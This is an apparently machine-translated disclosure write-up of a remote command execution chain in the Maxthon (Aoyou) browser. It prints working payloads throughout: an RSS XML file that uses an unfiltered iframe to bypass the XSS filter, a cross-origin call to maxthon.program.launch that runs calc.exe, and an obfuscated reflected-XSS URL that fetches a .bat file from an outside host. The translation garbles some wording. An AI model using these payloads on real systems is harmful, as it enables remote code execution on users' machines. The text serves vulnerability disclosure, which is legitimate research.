Aoyou Browser Remote Command Execution Vulnerability 2

Aoyou Browser Remote Command Execution Vulnerability 2

0x01 obtain the privileged domain XSS

Ao you browser has an RSS reader feature. In fact, the previous reporter has used this feature.

In this vulnerability, "the browser does not filter the title and description when processing xml content. The embedded code will be executed after being added .", So aoyou fixed the issue and filtered out the title and description.


Let's take a look at how proud games are filtered out ?, Write the following code:

<? Xml version = "1.0" encoding = "UTF-8"?> <Rss version = "2.0"> <channel> <title> wooyun.org latest vulnerability </title> <link> http://www.wooyun.org </Link> <ttl> 5 </ttl> <description> wooyun.org </description> <language> zh-cn </language> <generator> www.wooyun.org </generator> <webmaster> webmaster@wooyun.org </webmaster> <item> <link> WooYun: A website in Suning Tesco has the vulnerability of arbitrary logon, SMS bombing, and verification code bypass. </link> <title> <! [CDATA [a website of Suning Tesco has vulnerabilities such as arbitrary logon, SMS bombing, and verification code bypass]> </title> <description> <! [CDATA [<strong>  Brief description: </strong> <br/> Suning Tesco's website has the arbitrary logon, SMS bombing, and verification code bypass vulnerability in its full-network number. <br/> <strong> details: </strong> <br/> not publicly available <br/> <strong> <a href = "WooYun: A website in Suning Tesco has the vulnerability of arbitrary logon, SMS bombing, and verification code bypass. "target =" _ blank "> more content & gt; </a> </strong>]> </description> <pubDate> Wed, 05 Nov 2014 15:38:18 + 0800 </pubDate> <category> </category> <author> passer-by </author> <guid> WooYun: A website in Suning Tesco has the vulnerability of arbitrary logon, SMS bombing, and verification code bypass. </guid> </item> </channel> </rss>

Shows the effect:
 

As you can see, here the onerror is filtered into on_error, it is not hard to see that the filtering here does not make a "destructive" filter on the description, that is, filtering <and>; instead, the rich text filtering policy is adopted.

So how does maxcompute filter? Is this filtering mechanism implemented in browser built-in APIs or in JS?

By checking the JS Code on the page, I found the following content:


 

We can see that aoyou uses regular expressions in JS to filter the content,

Our onerror is filtered into on_error through the following regular expressions:
 

z = z.replace(/(<\S[^>]+on)([a-z]{1,16}?)\s*=/ig, "$1_$2=").replace(/(<a[^>]+)href\s*=(['"]?\s*javascript：)/ig, '$1 href="#" h_ref=$2');

In the past, rich text filtering was made by the black box to guess. Now, all the filtered regular expressions are in sight, and there are only a few regular expressions. Is it still difficult to get around? After a few seconds, we can find that the <iframe> tag is not filtered, so we can easily implement XSS.
<Iframe src = "javascript: alert (1)"/>

The effect is as follows:


 

Well, in this way, we get a privileged domain XSS. When we access http: // 192.168.1.13/mx/poc3.xml, aoyou automatically jumps to the following address, and execute our XSS code:
Mx: // res/app/% 7B4F562E60-F24B-4728-AFDB-DA55CE1597FE % 7D/preview.htm? Http: // 192.168.1.13/mx/poc3.xml

 

--------------------------------------------------------------



0x02 Cross-origin API calling can be implemented using the permission isolation design defect of aoyou



--------------------------------------------------------------



Ao you gives different permissions to different pages:



For example:



Mx: // res/notification/the page under this path allows access to maxthon. program


 

However,



Mx: // res/app/% 7B4F562E60-F24B-4728-AFDB-DA55CE1597FE % 7D/preview.htm? Access to maxthon. program is not allowed in the http: // 192.168.1.13/mx/poc3.xml path



This design is problematic because



The protocol on both pages is mx and the domain is res,



Therefore, the two pages can communicate with each other after the iframe is embedded. That is, in mx: // res/app/% 7B4F562E60-F24B-4728-AFDB-DA55CE1597FE % 7D/preview.htm? After the http: // 192.168.1.13/mx/poc3.xml page is embedded with mx: // res/notification/through iframe, you can call the program API through contentWindow. maxthon. program.


 

--------------------------------------------------------------



0x03 In summary, call the calculator to test



--------------------------------------------------------------



Based on the above analysis, it is not difficult to construct the following xml code:
 

<? Xml version = "1.0" encoding = "UTF-8"?> <Rss version = "2.0"> <channel> <title> wooyun.org latest vulnerability </title> <link> http://www.wooyun.org </Link> <ttl> 5 </ttl> <description> wooyun.org </description> <language> zh-cn </language> <generator> www.wooyun.org </generator> <webmaster> webmaster@wooyun.org </webmaster> <item> <link> WooYun: A website in Suning Tesco has the vulnerability of arbitrary logon, SMS bombing, and verification code bypass. </link> <title> <! [CDATA [a website of Suning Tesco has vulnerabilities such as arbitrary logon, SMS bombing, and verification code bypass]> </title> <description> <! [CDATA [<strong> <iframe name = 'var % 20 s % 3Ddocument. createElement % 28% 22 iframe % 22% 29% 3Bs. src % 3D % 22mx % 3A // res/notification/% 22% 3Bs. onload % 3 Dfunction % 28% 29% 7Bs. contentWindow. maxthon. program. program. launch % 28% 22C % 3A/windows/system32/calc.exe % 22% 2C % 22% 22% 7D % 3Bdocument. body. appendChild % 28 s % 29% 3B 'src = "javascript: eval (unescape (window. name); void 0; "/> Brief description: </strong> <br/> Suning Tesco's website has the arbitrary logon, SMS bombing, and verification code bypass vulnerability in its full-network number. <br/> <strong> details: </strong> <br/> not publicly available <br/> <strong> <a href = "WooYun: a website in Suning Tesco has the vulnerability of arbitrary logon, SMS bombing, and verification code bypass. "target =" _ blank "> More >></a> </strong>]> </description> <pubDate> Wed, 05 Nov 2014 15:38:18 + 0800 </pubDate> <category> </category> <author> passer-by </author> <guid> WooYun: A website in Suning Tesco has the vulnerability of arbitrary logon, SMS bombing, and verification code bypass. </guid> </item> </channel> </rss>

Users access maliciously constructed xml: http://xsst.sinaapp.com/test/mxpoc.xml, effects such:


 

--------------------------------------------------------------



0x04 if external. mxCall is not repaired ....



--------------------------------------------------------------



Find an XSS instance in the maxthon.cn domain and execute the following code.



External. mxCall ('installskin', "http://xsst.sinaapp.com/test/mx.bat ");

SetTimeout (function (){

Location. href = 'HTTP: // xsst.sinaapp.com/test/mxpocbat.xml ';

},1000 );



Here, I found a GOOGLE search (aoyou does not have an XSS filter, and it is easier to find a reflection type) for Demonstration:



Http://sso.maxthon.cn/quit.php? Host = www.007.mx % bf \'. replace (/. */,/javascript: eval (String. fromCharCode (101,120,116,101,114,110, 97,108, 46,109,120, 108,108, 73,110,115,116, 97,108,108, 83,107,105,110, 34,104,116,116,112, 47,120,115,115,116, 46,115,105,110, 112,112, 111,109, 47,116,101,115,116, 47,109,120, 97,116, 115,101,116, 84,105,109,101,111,117,116, 40,102,117,110, 99,116,105,111,110, 108,111, 116,105,111,110, 46,104,114,101,102, 104,116,116,112, 47,120,115,115,116, 46,115,105,110, 112,112, 111,109, 47,116,101,115,116, 47,109,120,112,111, 97,116, 46,120,109,108, 13,125, 59 ));/. source);} // & url =/login. php \'? Ac = dada

Solution:

1. XSS repair (rich text filtering, the blacklist is not secure, especially when it seems that your filtering code is still under our eyes, the iframe label in this article is only one of the bypass methods)